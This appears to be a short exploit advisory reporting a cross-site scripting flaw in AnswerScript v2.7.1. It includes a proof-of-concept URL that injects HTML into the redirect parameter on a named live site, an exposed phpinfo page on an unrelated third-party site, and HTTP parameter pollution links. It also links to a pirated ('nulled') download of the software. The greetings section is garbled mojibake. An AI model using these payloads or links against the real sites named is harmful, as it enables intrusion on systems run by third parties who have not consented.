AnswerScript version 2.7.1 suffers from a cross site scripting vulnerability.
9c6a3496429128b109c27d8c038eb36008a1315ff779be364d9d17791a02999d
========================================================================
| # Title : AnswerScript v2.7.1 XSS vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 8.1 FranASSais V.(Pro)
| # Version : v2.7.1
| # Vendor : http://www.p30vel.ir/wp-content/uploads/AnswerScript_v2.7.1_Nulled_www.P30vel.ir_.zip
| # Dork : n/a
========================================================================
poc :
http://www.prayzr.com//login?redirect=aHR0cDovL3d3dy5wcmF5enIuY29tL2Nzcy8/a2V5PWNzcw%3d%3d%27%22()%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E
php info :
http://www.curso-biomagnetismo.com/biomagnetismo/phpinfo.php
HTTP parameter pollution :
affects /login.php
Attack details :
URL encoded GET input redirect was set to aHR0cDovL3d3dy5wcmF5enIuY29tL2Nzcy8/a2V5PWNzcw==&n914757=v973596
Parameter precedence: last occurrence
Affected link: http://www.prayzr.com/signup?redirect=aHR0cDovL3d3dy5wcmF5enIuY29tL2Nzcy8/a2V5PWNzcw==&n914757=v973596
Affected parameter: redirect=aHR0cDovL3d3dy5wcmF5enIuY29tL2Nzcy8/a2V5PWNzcw==
Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------
|
jericho * Larry W. Cashdollar * moncet-1 * achraf.tn |
|
===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================